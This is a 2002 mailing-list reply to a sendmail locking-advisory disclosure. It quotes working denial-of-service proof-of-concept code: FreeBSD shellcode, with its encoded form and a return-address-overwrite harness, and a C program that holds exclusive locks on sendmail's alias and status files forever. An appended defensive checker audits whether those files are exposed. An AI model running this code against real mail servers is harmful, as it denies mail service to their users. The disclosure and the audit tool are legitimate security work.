Re: Sendmail file locking - PoC

From: David R (sdrhodus@kyblue.com)
Date: 05/27/02


Date: Sun, 26 May 2002 18:22:23 -0400
From: David R <sdrhodus@kyblue.com>
To: KF <dotslash@snosoft.com>

This is not really new. I can remember many times vi'ing the aliases file
and walking away and sendmail starting to cry.
 
KF wrote:

> A problem has been identified in sendmail that can result in a denial
> of service attack. Attached is proof of concept code for this issue.
>
> http://www.sendmail.org/LockingAdvisory.txt
>
> have a safe Memorial Day folks.
>
> -KF
>
>
>------------------------------------------------------------------------
>
>;
>; Safemode.org, written by zillion 2002/05/24
>; http://www.snosoft.com : zillion@snosoft.com
>; http://www.sendmail.org/LockingAdvisory.txt
>;
>; FreeBSD/i386: open("/etc/mail/aliases.db", O_RDONLY), flock(fd, LOCK_EX),
>; then never return, so the exclusive lock is never released.
>; FreeBSD int 0x80 convention: syscall number in eax, arguments on the
>; stack below a dummy return address.
>
>
>BITS 32
>
>jmp short callit
>
>doit:
>
>pop esi                 ; esi = address of the path string pushed by call
>xor eax,eax
>mov [esi + 20],al       ; write the NUL terminator right after the 20-byte path
>push eax                ; flags = O_RDONLY (0)
>push esi                ; path
>mov al,5                ; SYS_open
>push eax                ; dummy return address
>int 0x80                ; eax = fd
>
>push byte 0x2           ; LOCK_EX
>push eax                ; fd
>mov al,131              ; SYS_flock (only the low byte of eax changes)
>push eax                ; dummy return address
>int 0x80
>
>; We're going to stay forever ;-)
>; cl drops by 3 on each pass: once it goes negative the js spins on itself;
>; until then we fall through to call doit and lock the file again.
>
>sub cl,0x3
>l00p:
>js l00p
>
>callit:
>call doit               ; pushes the address of the string below as return address
>
>db '/etc/mail/aliases.db'
>
>
>------------------------------------------------------------------------
>
>/*
>
>FreeBSD Sendmail DoS shellcode that locks /etc/mail/aliases.db
>Written by zillion (at http://www.safemode.org && http://www.snosoft.com)
>
>More info: http://www.sendmail.org/LockingAdvisory.txt
>
>*/
>
>/* Encoded form of the assembly above: open("/etc/mail/aliases.db", O_RDONLY),
> flock(fd, LOCK_EX), then loop forever. The path follows the code. */
>char shellcode[] =
> "\xeb\x1a\x5e\x31\xc0\x88\x46\x14\x50\x56\xb0\x05\x50\xcd\x80"
> "\x6a\x02\x50\xb0\x83\x50\xcd\x80\x80\xe9\x03\x78\xfe\xe8\xe1"
> "\xff\xff\xff\x2f\x65\x74\x63\x2f\x6d\x61\x69\x6c\x2f\x61\x6c"
> "\x69\x61\x73\x65\x73\x2e\x64\x62";
>
>int main(void)
>{
>
> /* Overwrite main's saved return address with the shellcode address so the
> code runs when main returns. Assumes the classic i386 frame layout
> (&ret + 2 is the saved eip), no stack protector, and an executable data
> segment, as on FreeBSD of that era. */
> int *ret;
> ret = (int *)&ret + 2;
> (*ret) = (int)shellcode;
>}
>
>
>------------------------------------------------------------------------
>
>#include <fcntl.h>
>#include <stdio.h>
>#include <sys/file.h>
>#include <unistd.h>
>
>/*
>
>Stupid piece of code to test the sendmail lock vulnerability on
>FreeBSD. Run this and try sendmail -t on FreeBSD for example.
>
>More info: http://www.sendmail.org/LockingAdvisory.txt
>
>zillion (at safemode.org && snosoft.com)
>http://www.safemode.org
>http://www.snosoft.com
>
>*/
>
>/* Open path read-only and take an exclusive advisory lock on it. Only read
> access is needed for flock(); the lock belongs to the open file description,
> so leaving the descriptor open keeps the lock held. */
>static void lock_forever(const char *path)
>{
> int fd = open(path, O_RDONLY);
> if (fd < 0) {
>  perror(path);
>  return;
> }
> if (flock(fd, LOCK_EX) < 0)
>  perror(path);
>}
>
>int main(void) {
>
> if(fork() == 0) {
>
>  /* The files sendmail locks while it runs. */
>  lock_forever("/etc/mail/aliases");
>  lock_forever("/etc/mail/aliases.db");
>  lock_forever("/var/log/sendmail.st");
>
>  /* We are here to stay! */
>
>  for(;;) {}
>
> }
> return 0;
>}
>
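
The PoC above rests on one property visible in its code: flock() needs only a descriptor opened for reading, so any local account that can read the files sendmail locks can hold them exclusively. The checker below is an added example and is not code from this thread or from sendmail. It probes each file with a non-blocking LOCK_EX and reports whether the current user could take the lock (the host is exposed to this DoS) or whether another descriptor already holds it (a lock-holder such as the PoC child, or sendmail itself, is present). The function names probe_lock and report_lockable are this example's own; the default paths are the three the quoted program locks.

```c
#define _DEFAULT_SOURCE   /* flock() and mkstemp() prototypes on glibc; harmless on FreeBSD */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/file.h>
#include <unistd.h>

/* Outcome of a non-blocking LOCK_EX probe on one file. */
enum lock_state {
    LOCK_NOT_OPENABLE,   /* open() failed: missing or unreadable to us, so not exposed */
    LOCK_ACQUIRED,       /* we got the lock: any reader of this file can hang sendmail */
    LOCK_HELD_ELSEWHERE, /* another open file description holds it right now */
    LOCK_ERROR           /* flock() failed for some other reason */
};

/*
 * Try an exclusive advisory lock on path without blocking and release it at
 * once. On failure *err (if non-NULL) receives the errno of the failing call.
 * flock() locks belong to the open file description, so the probe conflicts
 * with a lock held through any other descriptor, even one in this process.
 */
enum lock_state probe_lock(const char *path, int *err)
{
    int fd = open(path, O_RDONLY);
    if (fd < 0) {
        if (err) *err = errno;
        return LOCK_NOT_OPENABLE;
    }
    if (flock(fd, LOCK_EX | LOCK_NB) == 0) {
        flock(fd, LOCK_UN);
        close(fd);
        return LOCK_ACQUIRED;
    }
    int e = errno;
    close(fd);
    if (err) *err = e;
    return (e == EWOULDBLOCK || e == EAGAIN) ? LOCK_HELD_ELSEWHERE : LOCK_ERROR;
}

const char *lock_state_name(enum lock_state s)
{
    switch (s) {
    case LOCK_NOT_OPENABLE:   return "not openable (not exposed to this user)";
    case LOCK_ACQUIRED:       return "LOCKABLE by this user";
    case LOCK_HELD_ELSEWHERE: return "already locked by another descriptor";
    default:                  return "flock() error";
    }
}

/* Probe every path, print one line each, and return how many this user
 * could lock exclusively. */
int report_lockable(const char *const *paths, size_t n)
{
    int lockable = 0;
    for (size_t i = 0; i < n; i++) {
        int err = 0;
        enum lock_state s = probe_lock(paths[i], &err);
        printf("%-28s %s", paths[i], lock_state_name(s));
        if (s == LOCK_ACQUIRED)
            lockable++;
        else
            printf(" (%s)", strerror(err));
        putchar('\n');
    }
    return lockable;
}

int main(int argc, char **argv)
{
    /* Defaults are the three files the PoC locks; paths on argv replace them. */
    static const char *const defaults[] = {
        "/etc/mail/aliases", "/etc/mail/aliases.db", "/var/log/sendmail.st"
    };
    int n;
    if (argc > 1)
        n = report_lockable((const char *const *)argv + 1, (size_t)(argc - 1));
    else
        n = report_lockable(defaults, sizeof defaults / sizeof defaults[0]);
    /* Exit 1 when run as an unprivileged user and at least one file is lockable. */
    return n > 0 ? 1 : 0;
}
```

Run it as an ordinary user to audit exposure; run it while the PoC child is alive and the files show as already locked. The probe cannot tell an attacker's lock from one held legitimately by a running sendmail, so pair a "locked" result with a look at who has the file open (fstat(1) on FreeBSD, lsof on Linux).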


